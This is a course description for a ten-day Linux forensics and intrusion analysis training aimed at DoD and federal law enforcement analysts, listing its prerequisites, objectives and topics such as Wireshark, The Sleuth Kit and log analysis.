IT270, Forensics and Intrusions in a Linux Environment (FILE)
Who Should Attend:
DoD and federal law enforcement intrusion analysts.
Prerequisites:
TT110 (INCH), RT120 (CIRC) and FT210 (WFE-E) or
FT215 (WFE-FTK) or Test Outs
Duration:
10 Days
Course Description:
FILE is a scenario-based course that teaches students how to conduct detailed Linux-based data
analysis in a laboratory environment. Students conduct forensic media analysis and log file
analysis to determine the specifics of a Linux-based intrusion. Topics also include hacking
methodologies that are key to understanding an attack, case preparation and management.
Objectives:
- Using tools and analysis techniques presented in class, analyze network traffic of an intruder and correlate the findings with forensic evidence found on a Linux victim machine
- Prepare a forensic examination system running the Linux operating environment
- Analyze a compromised system running the Linux operating environment by analyzing both system and log files
- Complete a detailed intrusion analysis report
Topics Covered
Network Architecture and Information Assurance
- Network Architecture Basics, including LAN/WAN Topologies and Network Services
- Introduction to Wireshark and Creating Filters
- Network and Application Protocol Analysis
Identifying an Intrusion
- Computer Intrusions, Goals, Attacker Profiles and Intrusion Phases
- The Goals, Strategies and Techniques of Reconnaissance, Attack, Entrenchment and Abuse
Case Management and Investigative Methodology
- Investigating Using the Scientific Method
- Documentation
System Preparation and Forensic Analysis
- The Linux File System and fundamentals of Linux Artifact Analysis
- Forensic System Setup
- Analyzing First Responder Data
- Beginning a case with The Sleuth Kit and Autopsy
- Keyword Searching
- Malicious Code Analysis
Network Device Analysis
- Fundamentals of Network Artifact Analysis
- Network Device Artifact Analysis
- Network Traffic Capture Analysis